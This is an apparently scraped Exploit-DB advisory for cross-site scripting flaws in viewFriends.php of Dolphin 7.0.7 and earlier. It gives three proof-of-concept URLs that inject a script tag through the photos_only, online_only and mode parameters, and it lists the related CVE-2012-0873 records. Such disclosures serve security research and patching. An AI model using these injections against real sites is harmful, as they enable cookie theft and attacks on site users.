Lucene search
Aung KhantEDB-ID:36853HistoryFeb 21, 2012 - 12:00 a.m.
Dolphin 7.0.x - 'viewFriends.php' Multiple Cross-Site Scripting Vulnerabilities
2012-02-2100:00:00
Aung Khant
www.exploit-db.com
12
source: https://www.securityfocus.com/bid/52088/info
Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dolphin 7.0.7 and prior versions are vulnerable.
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script> Related
prion
prion
Cross site scripting
2012-02-23 20:07:00
cvelist
cvelist
CVE-2012-0873
2012-02-23 19:00:00
nvd
nvd
CVE-2012-0873
2012-02-23 20:07:33
cve
cve
CVE-2012-0873
2012-02-23 20:07:33
exploitdb
exploitdb
Dolphin 7.0.x - 'explanation.php?explain' Cross-Site Scripting
2012-02-21 00:00:00
packetstorm
packetstorm
Dolphin 7.0.7 Cross Site Scripting
2012-02-21 00:00:00
securityvulns
securityvulns